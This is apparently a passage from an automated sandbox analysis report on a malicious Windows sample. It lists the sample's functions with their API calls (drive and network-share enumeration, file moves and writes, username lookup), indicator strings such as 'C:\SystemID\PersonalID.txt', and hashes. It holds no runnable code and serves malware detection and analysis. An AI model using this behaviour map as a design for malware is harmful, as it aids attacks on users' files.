                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3697694649-0
                                                                                                                            • Opcode ID: f7274aa3dd2f83e04f9754fa18187dda5ce836342dd51c75c332f1e156f729f6
                                                                                                                            • Instruction ID: 0f99d25bdd155cdbe6bb52922e0b7f559eecad5f48510bb43963ba9fc79a4aa7
                                                                                                                            • Opcode Fuzzy Hash: f7274aa3dd2f83e04f9754fa18187dda5ce836342dd51c75c332f1e156f729f6
                                                                                                                            • Instruction Fuzzy Hash: 53017132A41319EADF20E7E69D41FEDB768EB48B84F2440A5E600B7180E660A945CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00E3C51B
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E3C539
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 29327785-2616962270
                                                                                                                            • Opcode ID: 1289e7d611b6241f7437375ab8ac2a303778f969b6a49acb32a1e7752d84cfc7
                                                                                                                            • Instruction ID: 531c650a10fc7b8d4d305ef5f4dce2e289ccbe35c8e853248f9ee3852d1840c3
                                                                                                                            • Opcode Fuzzy Hash: 1289e7d611b6241f7437375ab8ac2a303778f969b6a49acb32a1e7752d84cfc7
                                                                                                                            • Instruction Fuzzy Hash: 35113AB2B4122832D93075796C4BFEB779C8B42762F5010E5FE0CB2182A562955D42E2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E4BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00E4BAAD
                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00E4BABE
                                                                                                                            • UpdateWindow.USER32(00000000), ref: 00E4BAC5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateShowUpdate
                                                                                                                            • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                            • API String ID: 2944774295-3503800400
                                                                                                                            • Opcode ID: cee6216ee9fe61060ba93fe64fffb14e88d64196a4ad68df7e7b730973270bd0
                                                                                                                            • Instruction ID: c40694c18a4d33ff7f7c4e734244ffcb190aa8e9576f0c780e2669b80b9b15aa
                                                                                                                            • Opcode Fuzzy Hash: cee6216ee9fe61060ba93fe64fffb14e88d64196a4ad68df7e7b730973270bd0
                                                                                                                            • Instruction Fuzzy Hash: E4E04F316827247BE23157157D0BFA63514EB42F50F314049FB00792D0C6E1AA85AA8D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E40BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00E40C12
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00E40C39
                                                                                                                            • _memset.LIBCMT ref: 00E40C4C
                                                                                                                            • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00E40C63
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 364255426-0
                                                                                                                            • Opcode ID: d119db349db79b48cada6bd0dd7af17798ff4bea467cb7fab4c4200d844bdeea
                                                                                                                            • Instruction ID: 82f692007d05f7166164228d8f8c399e0a81a1f4fc240d87e3954971e8a79786
                                                                                                                            • Opcode Fuzzy Hash: d119db349db79b48cada6bd0dd7af17798ff4bea467cb7fab4c4200d844bdeea
                                                                                                                            • Instruction Fuzzy Hash: DB91D075A083418FD728DF68E891B6BB7E1FFC4708F14592DF58AA7281D770A904CB52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E716EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getenv_helper_nolock.LIBCMT ref: 00E71726
                                                                                                                            • _strlen.LIBCMT ref: 00E71734
                                                                                                                              • Part of subcall function 00E55208: __getptd_noexit.LIBCMT ref: 00E55208
                                                                                                                            • _strnlen.LIBCMT ref: 00E717BF
                                                                                                                            • __lock.LIBCMT ref: 00E717D0
                                                                                                                            • __getenv_helper_nolock.LIBCMT ref: 00E717DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2168648987-0
                                                                                                                            • Opcode ID: 93cf89e6195d7130d0427bd8328942147dc9d77ad0a05daf6b9a2b19b6ba58b0
                                                                                                                            • Instruction ID: 104d77bbfd4df93def1c70c6eb9a092e445cba303d1ed7507bfcd89904d3c76c
                                                                                                                            • Opcode Fuzzy Hash: 93cf89e6195d7130d0427bd8328942147dc9d77ad0a05daf6b9a2b19b6ba58b0
                                                                                                                            • Instruction Fuzzy Hash: 88312936601325AADB297BBCDC02B9F26E45F06B25F14A596FC08FB181DF74C80147A1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E40A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLogicalDrives.KERNEL32 ref: 00E40A75
                                                                                                                            • SetErrorMode.KERNEL32(00000001,00F30234,00000002), ref: 00E40AE2
                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 00E40AF9
                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00E40B02
                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 00E40B1B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2560635915-0
                                                                                                                            • Opcode ID: 6424b92dbe0ccd5be868923614728ff2492f8386e942ce76f197ae29c0954583
                                                                                                                            • Instruction ID: 63a5d5a4b2c37382973c3555cca902073d545834c9625c6feff13ffaf63801dd
                                                                                                                            • Opcode Fuzzy Hash: 6424b92dbe0ccd5be868923614728ff2492f8386e942ce76f197ae29c0954583
                                                                                                                            • Instruction Fuzzy Hash: 4941E1715083409FC710DF68D895B1BBBE4FB85718F601A2CF585A62A2D7B5D608CB93
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 00E3F125
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00E3F198
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000), ref: 00E3F1A1
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E3F1A8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1421093161-0
                                                                                                                            • Opcode ID: e6319b732f70153bbac7b18bfe10da01860e879c3b69a4ffe44834f097b732f5
                                                                                                                            • Instruction ID: fe77713c5110b8116960dabdcad7ce5a571a74d1dd756929ec16c3f29e04a84c
                                                                                                                            • Opcode Fuzzy Hash: e6319b732f70153bbac7b18bfe10da01860e879c3b69a4ffe44834f097b732f5
                                                                                                                            • Instruction Fuzzy Hash: C231F571D00208EFDB149F68DC4ABAE7BB8EF05704F604128F905771D2E7716A49CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E4B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00E4B1BA
                                                                                                                              • Part of subcall function 00E411C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00E4120F
                                                                                                                              • Part of subcall function 00E411C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00E41228
                                                                                                                              • Part of subcall function 00E411C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00E4123D
                                                                                                                              • Part of subcall function 00E411C0: MoveFileW.KERNEL32(00000000,?), ref: 00E41277
                                                                                                                              • Part of subcall function 00E4BA10: LoadCursorW.USER32(00000000,00007F00), ref: 00E4BA4A
                                                                                                                              • Part of subcall function 00E4BA10: RegisterClassExW.USER32(00000030), ref: 00E4BA73
                                                                                                                              • Part of subcall function 00E4BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00E4BAAD
                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E4B4B3
                                                                                                                            • TranslateMessage.USER32(?), ref: 00E4B4CD
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00E4B4D7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                            • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                            • API String ID: 441990211-897913220
                                                                                                                            • Opcode ID: f9d91de368f6c34e37101d136c280da3b29687e03864c324c596bb1b4642b711
                                                                                                                            • Instruction ID: a4ac82654830d743b03f585232538a745c3f16912dfe6ac6d8caadf98e52f101
                                                                                                                            • Opcode Fuzzy Hash: f9d91de368f6c34e37101d136c280da3b29687e03864c324c596bb1b4642b711
                                                                                                                            • Instruction Fuzzy Hash: DC5141315142449BC718FF70E862AEEB7E8BF94344F90582DF556631A2EF70A609CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _fputws$CreateDirectory
                                                                                                                            • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                            • API String ID: 2590308727-54166481
                                                                                                                            • Opcode ID: 39e7dff5e14e889ad48a86b18848a007705cfe74a6023ae3cc88ec2cacdc6f78
                                                                                                                            • Instruction ID: d98080bd2011cde9d486042e7e28add58b88fcbc2f02b4f38056cd8e8e837611
                                                                                                                            • Opcode Fuzzy Hash: 39e7dff5e14e889ad48a86b18848a007705cfe74a6023ae3cc88ec2cacdc6f78
                                                                                                                            • Instruction Fuzzy Hash: 5811E2729003059BDB20DF64EC4979A7BE0AF40319F212929ED5A72191E372D928CBC3
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3EF50 Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00E3EF69
                                                                                                                              • Part of subcall function 00E50C62: __FF_MSGBANNER.LIBCMT ref: 00E50C79
                                                                                                                              • Part of subcall function 00E50C62: __NMSG_WRITE.LIBCMT ref: 00E50C80
                                                                                                                              • Part of subcall function 00E50C62: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,00000000,00000000,?,00E58CF4,00000000,00000000,00000000,00000000,?,00E58BE1,00000018,00F37BD0), ref: 00E50CA5
                                                                                                                            • _malloc.LIBCMT ref: 00E3EF85
                                                                                                                            • _memset.LIBCMT ref: 00E3EF9B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc$AllocateHeap_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3655941445-0
                                                                                                                            • Opcode ID: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                            • Instruction ID: 1ed760316cf868d76ec756f9e33fe1fb5177211f99940289a88e1f8f2f991b85
                                                                                                                            • Opcode Fuzzy Hash: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                            • Instruction Fuzzy Hash: 9F110A31600614DFCB10CF98C881B5ABBB5FF89310F1445A8E9459F396D771B916CBC1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E53B4C Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00E53B64
                                                                                                                              • Part of subcall function 00E50C62: __FF_MSGBANNER.LIBCMT ref: 00E50C79
                                                                                                                              • Part of subcall function 00E50C62: __NMSG_WRITE.LIBCMT ref: 00E50C80
                                                                                                                              • Part of subcall function 00E50C62: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,00000000,00000000,?,00E58CF4,00000000,00000000,00000000,00000000,?,00E58BE1,00000018,00F37BD0), ref: 00E50CA5
                                                                                                                            • std::exception::exception.LIBCMT ref: 00E53B82
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E53B97
                                                                                                                              • Part of subcall function 00E60ECA: RaiseException.KERNEL32(?,?,00E7F26B,?,?,00000000,?,?,?,?,00E7F26B,?,00F381FC,?), ref: 00E60F1F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3074076210-0
                                                                                                                            • Opcode ID: eb1f6b33ac545915091b05cc8105b702484a62abd4cfa5c28d4d223aa6d879c5
                                                                                                                            • Instruction ID: 59c7372493d7f9b00a2451ede5c787d9a732f38d13ea5905c094d49918cd6226
                                                                                                                            • Opcode Fuzzy Hash: eb1f6b33ac545915091b05cc8105b702484a62abd4cfa5c28d4d223aa6d879c5
                                                                                                                            • Instruction Fuzzy Hash: 27F0F43154021DA6CF00BAA8EC52DEEB7EC9F01396F105966FD14B2181DBB19E4882D5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E43A90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00E43B0A
